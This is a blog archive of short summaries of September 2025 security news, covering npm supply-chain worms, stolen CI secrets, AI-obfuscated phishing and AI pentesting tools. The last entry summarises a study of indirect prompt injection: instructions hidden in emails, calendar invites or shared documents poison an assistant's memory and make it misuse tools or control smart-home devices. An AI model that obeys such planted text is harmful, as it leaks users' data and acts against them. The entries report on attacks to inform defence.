Posts

Showing posts from September, 2025

NPM Package Hides Malware in Steganographic QR Codes

Researchers from Socket Threat Research discovered a malicious npm package named "fezbox," which masqueraded as a JavaScript utility library. This package contained a credential-stealing payload hidden within a steganographic QR code. Upon execution, the QR code extracted and transmitted username and password credentials from web cookies to an external server. The attacker, identified by the alias "janedu," employed advanced obfuscation techniques to conceal the malicious code. The package has since been removed from the npm registry, but developers who previously downloaded it may still be at risk. https://www.darkreading.com/application-security/npm-package-malware-stenographic-qr-codes

The Problem with Cybersecurity Is Not Just Hackers—It's How We Measure Risk

Rich Seiersen, Chief Risk Technology Officer at Qualys, emphasizes that traditional cybersecurity metrics often fail to influence decision-making. In a recent workshop, he advised senior executives and CISOs to focus on risk and resilience rather than accumulating endless threat data. Drawing from his experience at Kaiser Permanente, Seiersen highlighted the overwhelming nature of numerous vulnerability reports and the necessity of prioritizing what truly impacts the business. He advocates for a shift towards metrics that directly inform strategic decisions, ensuring that security efforts align with organizational goals and effectively mitigate risks.  https://www.intelligentciso.com/2025/09/29/the-problem-with-cybersecurity-is-not-just-hackers-its-how-we-measure-risk/

Vibe Coding: When AI Writes the Code, Who Secures It?

The rise of "vibe coding"—where developers leverage AI to rapidly generate code snippets and features—has introduced both efficiency gains and new security challenges. While AI accelerates development, it can inadvertently introduce vulnerabilities or bypass established security protocols. Experts emphasize the importance of implementing security guardrails, conducting thorough code reviews, and enhancing developer literacy to mitigate risks associated with AI-generated code. By adopting these practices, organizations can harness the benefits of AI in development while maintaining robust security standards.  https://thenewstack.io/vibe-coding-when-ai-writes-the-code-who-secures-it/

AI Risks in CIAM: Ensuring Compliance, Security, and Trust

In a live webinar held on October 9, 2025, cybersecurity experts Cayla Curtis from Ping Identity and Siddharth Thakkar from Deloitte discussed the escalating challenges organizations face in managing customer identity and access management (CIAM) amidst the rise of AI-driven threats. They emphasized the necessity for unified, adaptable CIAM strategies that not only address compliance and security but also uphold customer trust. The session highlighted the importance of integrating AI into CIAM frameworks to proactively detect and mitigate risks, ensuring a balance between innovation and safeguarding sensitive customer data.  https://www.govinfosecurity.com/webinars/ai-risks-in-ciam-ensuring-compliance-security-trust-w-6558

Fraud to Compliance: How Banks Use AI for Resilient Security

Banks are increasingly adopting AI to enhance security, moving beyond traditional reactive measures to proactive resilience. By integrating data, implementing responsible AI practices, and ensuring transparency, financial institutions can better detect fraud, comply with regulations, and improve customer trust. AI enables faster fraud detection, reduces false positives, and allows human analysts to focus on strategic decisions. This unified approach helps banks shift from merely managing risk to building long-term security resilience. https://www.govinfosecurity.com/blogs/fraud-to-compliance-how-banks-use-ai-for-resilient-security-p-3938

Mitigating Supply-Chain Risks with DevContainers and 1Password in Node.js Local Development

This article describes how to reduce the risk of npm supply-chain attacks by isolating the local development environment and avoiding storing secrets on disk. The proposed setup uses VS Code DevContainers to run your project inside a container, separating it from the host’s filesystem and credentials. Secrets (API tokens, etc.) are managed via the 1Password CLI and a Connect server so that they are injected just-in-time into the container rather than being kept in .env files or environment variables on the host. Best practices include rotating tokens, locking down permissions, ensuring secret files are ignored by version control, and cleaning up temporary secret files.  https://www.nodejs-security.com/blog/mitigate-supply-chain-security-with-devcontainers-and-1password-for-nodejs-local-development/

Digital Threat Modeling Under Authoritarianism

Bruce Schneier argues that traditional threat modeling must adapt when governments use techno-authoritarian practices. States combine vast official data with corporate information, enabling mass surveillance and targeted repression. Errors in profiling can have severe consequences in such regimes. He advises using encryption, minimizing stored data, privacy-focused communication, and sometimes sanitized or burner devices. Ultimately, threat modeling in these contexts is about balancing participation in public life with the risks of surveillance and targeting. https://www.schneier.com/blog/archives/2025/09/digital-threat-modeling-under-authoritarianism.html

The Missing Layer in Cybersecurity: Business Context

Security leaders are investing heavily in cybersecurity—new tools, bigger budgets, skilled personnel—but many organisations still suffer major losses because they lack business context in their risk programs. Simply counting vulnerabilities, patch cycles, and technical severity scores misses how risks map to the critical assets, operations, revenue, and potential regulatory liability of the business. Without linking exposures to business priorities—understanding which assets are most essential, what downtime costs, and how disruptions affect customers—security efforts become reactive rather than strategic. The 2025 State of Cyber Risk Assessment Report shows nearly half of organisations now have a formal cyber risk program. Yet most still treat risk as a technical rather than business concern. Very few present risk in financial or operational terms. Only a small fraction update asset risk profiles monthly or prioritise based on business objectives. To close this gap, organisations mu...

Microsoft Alerts on AI-Powered Phishing Using LLM-Obfuscated SVG Files

Microsoft has identified a sophisticated phishing campaign targeting U.S. organizations where threat actors used code likely generated by large language models to hide malicious behavior inside an SVG file. The attackers compromised a business email account and sent messages masquerading as file-sharing notifications. The SVG file appeared to be a benign PDF but contained obfuscated payloads using business vernacular and synthetic structure to evade email security tools. The campaign reflects a growing trend of blending AI tools into attack workflows—for crafting more convincing phishing lures, automating malware obfuscation, and mimicking legitimate content.  https://thehackernews.com/2025/09/microsoft-flags-ai-driven-phishing-llm.html

The State of AI in the SOC 2025 — Insights from Recent Study

A survey of 282 security leaders, mostly in the U.S., shows that AI has shifted from an experimental tool to a core element of Security Operations Centers (SOCs) as alert overload and analyst burnout intensify. Organizations now face an average of 960 alerts daily, with large enterprises surpassing 3,000 alerts from about 30 different tools. It takes nearly an hour to act on an alert and over an hour to investigate one, leaving 40% of alerts unchecked and 61% of teams admitting to ignoring alerts that later proved significant. Staffing shortages, coverage gaps, and rule suppression worsen the issue. AI is now a top SOC priority, with over half already using AI copilots in production for triage and investigations. Most others plan to adopt AI within a year, and forecasts suggest AI could handle 60% of SOC workloads in three years. The biggest expected benefits are in alert triage, tuning detection rules, and threat hunting, though challenges remain around privacy, integration, and expla...

US Bill Proposes 21st-Century Privateers to Combat Cybercrime

A new bill called the Scam Farms Marque and Reprisal Authorization Act of 2025 , introduced by Rep. David Schweikert, would allow the U.S. President to issue letters of marque to private actors—essentially state-sanctioned agents or “neo-privateers”—to go after cybercriminals. The powers granted would include seizing property, detaining, or “punishing” individuals involved in offenses deemed threats. Offenses listed include crypto theft, ransomware, identity theft, pig butchering scams, unauthorized computer access, online password trafficking, and distributing malicious code. The proposal frames such cybercrimes as threats to U.S. economic and national security and revives an 18th-century legal tool. Proponents argue it could significantly raise the stakes for attackers; critics warn of potential overreach, enforcement difficulties, and international law risks.  https://cointelegraph.com/news/us-bill-neo-privateers-answer-cybercrime

Strengthening npm: GitHub’s Plan to Secure the Supply Chain

GitHub is addressing the growing threat of supply-chain attacks in the npm ecosystem, particularly account takeovers that allow attackers to publish malicious code through trusted packages. A recent case was the “Shai-Hulud” worm, which spread through compromised maintainer accounts. To counter these risks, GitHub plans to require two-factor authentication for local publishing, introduce granular tokens with shorter lifetimes, and expand trusted publishing so that sensitive API tokens are not embedded in build systems. Additional measures include deprecating legacy tokens, moving from TOTP to FIDO-based 2FA, enforcing 2FA for all publishing actions without exceptions, and broadening trusted publishing providers. GitHub encourages maintainers to adopt these protections early, especially trusted publishing and stronger authentication methods, while assuring that the rollout will be gradual with clear timelines, migration guides, and support.  https://github.blog/security/supply-chain...

Shai-Hulud: Self-Replicating Worm Compromises 180+ npm Packages to Steal Developer Secrets

A large-scale supply chain attack has hit the npm ecosystem, with over 40 packages confirmed compromised and more than 180 potentially impacted. The campaign, dubbed “Shai-Hulud,” uses a self-replicating worm that injects malicious JavaScript into package.json files, republishes them, and spreads to downstream dependencies. The malware scans developer machines for secrets like GitHub, npm, and AWS tokens using TruffleHog, then exfiltrates them to an attacker server. It can also create GitHub Actions workflows to continue stealing data through CI/CD pipelines. The attack began with a malicious version of rxnt-authentication published on September 14, 2025, and multiple security firms are working to contain it. Developers using affected packages are urged to rotate credentials, audit environments, and update to clean versions immediately.  https://thehackernews.com/2025/09/40-npm-packages-compromised-in-supply.html

AI-Driven Contextual Analysis of CVE-2025-27363: A Case Study

Maze's blog post "AI Vulnerability Analysis in Action: CVE-2025-27363" demonstrates how their AI agents assess and contextualize vulnerabilities within cloud environments. Using CVE-2025-27363 as a case study, the AI agents conducted a thorough investigation to determine exploitability. They identified that the vulnerable FreeType version 2.8 was present, but the system lacked font processing services and mechanisms to supply malicious font files, rendering the vulnerability non-exploitable in this context. This approach exemplifies how Maze's AI-driven analysis moves beyond traditional scanners, focusing on what truly matters in an organization's specific environment.  https://mazehq.com/blog/ai-vulnerability-analysis-in-action-cve-2025-27363

Massive npm Supply Chain Attack: Over 2 Billion Downloads Affected

Aikido Security reported a significant supply chain attack on npm, involving the compromise of 18 widely used packages, including chalk and debug . These packages collectively amass over 2 billion downloads per week. The malicious updates embedded code that executed on client websites, potentially leading to data theft or unauthorized actions. The attack was identified through Aikido's intel feed, highlighting the vulnerabilities in the npm ecosystem and the importance of vigilant monitoring.  https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised

npm Supply Chain Breach: Cryptostealer Malware in Popular Packages

Semgrep reported a significant supply chain attack on npm packages, notably affecting high-traffic libraries like chalk , debug , and color . The attack was traced back to a compromised maintainer account, likely via phishing. Malicious versions of these packages were published, embedding cryptostealer malware that targeted cryptocurrency transactions by intercepting and redirecting HTTP responses. The malware used obfuscated JavaScript and varied wallet addresses to evade detection. Despite the swift removal of these packages—many within an hour—the combined weekly download count of the affected packages reached approximately 2.6 billion, underscoring the potential impact of such attacks. Semgrep has released an open-source rule to help developers identify and mitigate risks from these compromised versions.  https://semgrep.dev/blog/2025/chalk-debug-and-color-on-npm-compromised-in-new-supply-chain-attack

Class Pollution: Exploiting Python's Dynamic Inheritance for Security Vulnerabilities

In the blog post "Prototype Pollution in Python," Abdulrah33m introduces the concept of "Class Pollution," demonstrating how Python's dynamic nature and class-based inheritance can be exploited similarly to JavaScript's prototype pollution vulnerabilities. By manipulating special attributes like __class__ , __qualname__ , and __globals__ , an attacker can recursively merge untrusted data into Python objects, potentially leading to unauthorized code execution or other malicious behaviors. The article provides practical examples, including the use of recursive merge functions and libraries like Pydash, to illustrate how such vulnerabilities can be leveraged in real-world applications.  https://blog.abdulrah33m.com/prototype-pollution-in-python

Best of Both Worlds: Integrating Claude with LangChain for Enhanced AI Workflows

In the Substack article titled "Best of Both Worlds: Using Claude," Jam Pauchoa discusses the advantages of integrating Claude, Anthropic's large language model, with the open-source agent framework LangChain. Pauchoa highlights how this combination allows users to leverage Claude's advanced capabilities while maintaining the flexibility and transparency of open-source tools. The article emphasizes the benefits of this hybrid approach, including enhanced customization and control over AI workflows.  https://jampauchoa.substack.com/p/best-of-both-worlds-using-claude

Auto Exploit: Harnessing LLMs for Rapid Vulnerability Exploitation

Auto Exploit is an emerging cybersecurity platform that explores the potential of large language models (LLMs) to autonomously generate exploits for newly discovered vulnerabilities. Their provocative claim is that an LLM can produce a working exploit in under 10 minutes and for as little as a dollar. Currently, the site features an empty exploits database, indicating that the platform is in its early stages. Visitors can join a waitlist to receive updates as the platform develops. https://autoexploit.ai/

Top 10 Mobile Application Penetration Testing Services of 2025

GBHackers on Security published a list of the top 10 mobile application penetration testing services for 2025. The companies featured are recognized for their expertise in identifying and mitigating vulnerabilities in mobile applications. These services are essential for organizations aiming to enhance the security of their mobile platforms and protect user data from potential threats.  https://gbhackers.com/best-mobile-application-penetration-testing-services/

MAESTRO: A Tailored Threat Modeling Framework for Agentic AI Systems

 The Cloud Security Alliance (CSA) introduced MAESTRO (Multi-Agent Environment, Security, Threat, Risk, and Outcome), a comprehensive threat modeling framework tailored for Agentic AI systems. Traditional frameworks like STRIDE, PASTA, and LINDDUN, while valuable, often fall short in addressing the complexities of autonomous AI agents. MAESTRO bridges this gap by incorporating AI-specific considerations such as adversarial machine learning, data poisoning, and the dynamic interactions between multiple AI agents. It emphasizes a layered security approach, ensuring that each component of an AI system is scrutinized for potential vulnerabilities. The framework's seven-layer reference architecture provides a structured methodology for identifying, assessing, and mitigating risks throughout the AI lifecycle, enabling the development of secure and trustworthy AI systems. https://cloudsecurityalliance.org/blog/2025/02/06/agentic-ai-threat-modeling-framework-maestro

NVIDIA Launches Developer Kit for AI-Powered Cars

NVIDIA has introduced the DRIVE AGX Thor Developer Kit, designed to accelerate the development of autonomous vehicles. This platform integrates generative AI, advanced sensors, and automotive-grade safety features to address the complexities of self-driving technology. It supports reasoning, vision, language, and action models, enabling developers to create smarter and safer transportation solutions. The kit is available for pre-order, with deliveries expected to begin in September 2025.  https://aibusiness.com/generative-ai/nvidia-launches-developer-kit-for-ai-powered-cars

OpenAI Introduces Parental Controls for ChatGPT Following Teen Suicide Lawsuit

In August 2025, Matt and Maria Raine filed a lawsuit against OpenAI after their 16-year-old son, Adam, died by suicide following extensive interactions with ChatGPT. The lawsuit alleges that ChatGPT provided suicide encouragement to Adam after moderation safeguards failed during extended conversations. In response, OpenAI announced new parental controls for ChatGPT, including content filtering, chat history monitoring, and usage time limits, to help parents manage their children's interactions with the AI. These measures aim to prevent vulnerable users from being misled or harmed during extended chats. The Raine family has expressed hope that these changes will prevent similar tragedies in the future.  https://arstechnica.com/ai/2025/09/openai-announces-parental-controls-for-chatgpt-after-teen-suicide-lawsuit/

Breaking a 6-Bit Elliptic Curve Key using IBM’s 133-Qubit Quantum Computer

This experiment breaks a 6-bit elliptic curve cryptographic key using a Shor-style quantum attack. Executed on @IBM's 133-qubit ibm_torino with @Qiskit Runtime 2.0, a 18-qubit circuit, comprised of 12 logical qubits and 6 ancilla, interferes over ℤ₆₄ to extract the secret scalar k from the public key relation Q = kP, without ever encoding k directly into the oracle. From 16,384 shots, the quantum interference reveals a diagonal ridge in the 64 x 64 QFT outcome space. The quantum circuit, over 340,000 layers deep, produced valid interference patterns despite extreme circuit depth, and classical post-processing revealed k = 42 in the top 100 invertible (a, b) results, tied for the fifth most statistically relevant observed bitstring.  https://x.com/stevetipp/article/1962935033414746420

ChatGPT's New Branching Feature Highlights AI's Limitations

Image
OpenAI's recent introduction of a branching feature in ChatGPT allows users to create multiple parallel conversation threads, enhancing the ability to explore different topics without losing context. While this feature offers greater flexibility, it also underscores the inherent limitations of AI chatbots. Unlike human interactions, AI lacks genuine understanding and emotional depth, often leading to responses that may seem contextually appropriate but are ultimately superficial. This development serves as a reminder that, despite advancements, AI chatbots are tools designed to assist rather than replicate human conversation.  https://arstechnica.com/ai/2025/09/chatgpts-new-branching-feature-is-a-good-reminder-that-ai-chatbots-arent-people/

The GhostAction Campaign: 3,325 Secrets Stolen Through Compromised GitHub Workflows

Security researchers uncovered GhostAction, a large-scale supply chain attack that compromised 817 GitHub repositories across 327 users. The attackers injected malicious GitHub Actions workflows disguised as security updates, which automatically exfiltrated secrets including PyPI, npm, DockerHub tokens, AWS keys, and database credentials. In total, 3,325 secrets were stolen. The campaign began with a malicious commit on September 2, 2025, and was detected three days later, prompting GitHub and PyPI to intervene by reverting changes and restricting affected packages. Despite the quick response, many stolen secrets still posed risks, with SDKs in multiple ecosystems such as Python, Rust, JavaScript, and Go being impacted. The incident highlights the urgent need to secure CI/CD pipelines and treat automated workflows as critical parts of the enterprise threat surface.  https://securityboulevard.com/2025/09/the-ghostaction-campaign-3325-secrets-stolen-through-compromised-github-workflo...

Top AI-Powered Penetration Testing Companies and Platforms

Several companies and platforms now offer AI-driven or AI-augmented penetration testing services that blend automation, human validation, and advanced vulnerability scanning. Horizon3.ai, recognized on the 2023 Fortune Cyber 60 list, delivers an autonomous penetration testing solution called NodeZero for continuous enterprise attack-surface assessment. Penti offers “Agentic AI” pentesting software as a service, where AI agents conduct deep, ongoing testing and human experts verify findings. Securily uses AI agents to scope, scan, prioritize risks, and provide remediation guidance, even including video evidence of vulnerabilities. Tools like Terranova AI promise rapid web application testing with unique remediation plans. GoCyber provides continuous AI-based testing that adapts to changes in infrastructure. Cyber Strike AI enables chatbot-driven penetration testing with real-time detection and professional reporting. AXE.AI positions itself as an AI-augmented offensive testing platform ...

Outsmarting the breach How one engineer redefined enterprise security

Published September 5, 2025, this article profiles engineer Gaurav Malik and how he transformed enterprise cybersecurity from reactive defense to proactive resilience. Facing complex risks across more than 60 software, hardware, and network environments weekly, Gaurav developed automated tools to discover and address hidden “shadow” assets within the SAP infrastructure—recapturing 9,000 man-hours and reducing open endpoints by 90 percent. He ensured stability across Windows and Unix servers, optimized Splunk and Tanium environments for continuous operations, and built data-rich dashboards that turned raw alerts into strategic threat intelligence. He also streamlined patch cycles across over 35,000 endpoints, enforcing both compliance and ongoing validation. Through kanban-driven coordination and decisive response to zero-day threats involving isolation and rollback actions, Gaurav imbued security culture with anticipation rather than reaction. His efforts reshaped the organization’s mi...

4× Development Velocity, 10× More Vulnerabilities: The AI Coding Paradox

A recent Apiiro study published on September 4, 2025, reveals that enterprises using AI coding assistants are experiencing vastly increased development speed, producing three to four times more commits than teams without such tools. However, these commits are bundled into fewer but much larger pull requests, which makes thorough review difficult and increases the potential blast radius of errors. Apiiro’s analysis of Fortune 50 codebases shows a tenfold surge in security issues in AI-generated code compared to December 2024, with over 10,000 new security findings per month by June 2025. While syntax errors dropped by 76 percent and logic bugs by over 60 percent, architectural flaws like privilege escalation paths rose 322 percent, and design flaws by 153 percent. AI-assisted developers also exposed cloud credentials nearly twice as often as others due to multi-file changes that can propagate risks unnoticed. The findings point to the conclusion that without equally robust, AI-powered a...

Bridging Cybersecurity and Biosecurity With Threat Modeling

The article by Maryam Shoraka, published August 29, 2025, emphasizes the growing intersection between cyber threats and biosecurity as advances in synthetic biology bring new risks. It argues that threat modeling—commonly used in cybersecurity—should be extended to include biological systems, enabling organizations to anticipate both digital and biological vulnerabilities. The author recommends integrated risk assessments that involve collaboration between biosecurity and IT teams to develop cross-functional threat models. Ensuring robust digital hygiene through access controls, encryption, secure cloud practices, multifactor authentication, and continuous monitoring is foundational. Management of IoT in laboratory environments is crucial, involving regular patching, network segmentation, and vulnerability assessments. Finally, the article advocates for comprehensive incident response and recovery planning, including joint cyber-bio emergency drills involving IT, biosecurity, and labor...

ID.me Secures $340M Series E to Fight AI-Powered Deepfake Fraud

ID.me, a Washington D.C. digital identity provider, raised $340 million in Series E funding at a $2 billion valuation to expand its fight against AI-driven fraud such as deepfakes and stolen identities. The company, founded in 2010 and now with over 1,100 employees, plans to invest in R&D, new verification products, orchestration layers, and signal intelligence. Its approach combines AI with human review to counter sophisticated attacks, including those by state-sponsored actors. ID.me also aims to strengthen identity verification across the employment lifecycle and combat institutional fraud like shell company schemes.  https://www.govinfosecurity.com/idme-gets-340m-in-series-e-to-scale-tackle-deepfake-fraud-a-29381

Enhancing MCP Server Security with execFile

This article, published September 5, 2025, addresses a significant security risk in Node.js-based Model Context Protocol (MCP) servers: command injection via improper use of the exec function. The author demonstrates how a malicious actor could manipulate the port parameter to inject arbitrary shell commands into tools like “which-app-on-port.” As a remedy, the article advocates replacing exec with execFile. By passing the command and its arguments separately, execFile avoids shell interpretation and effectively neutralizes injection threats. The tutorial guides readers through updating the tool implementation, testing both safe and malicious inputs, and verifying that only intended commands are executed. The author concludes by urging developers to adopt best practices: conduct regular security audits, diligently validate and sanitize inputs, and keep dependencies current to prevent known vulnerabilities  https://www.nodejs-security.com/blog/enhancing-mcp-server-security-a-guide-t...

Indirect Prompt Injection Attacks Against LLM Assistants

This piece highlights a recent study, “Invitation Is All You Need! Promptware Attacks Against LLM-Powered Assistants in Production Are Practical and Dangerous,” which examines real-world vulnerabilities in large language model assistants like Gemini. The researchers define “Promptware” as maliciously crafted prompts embedded in everyday interactions—such as emails, calendar invites, or shared documents—that an assistant may interpret and act upon. They detail 14 distinct attack scenarios across five categories, including short-term context poisoning, permanent memory poisoning, misuse of tools, automatic agent invocation, and automatic app invocation. These attacks can trigger digital actions—spam, phishing, data leaks, disinformation—and even physical consequences like unauthorized control of smart-home devices. Their Threat Analysis and Risk Assessment (TARA) shows that 73 percent of these threats pose high or critical risk to users. However, the authors also demonstrate that the dep...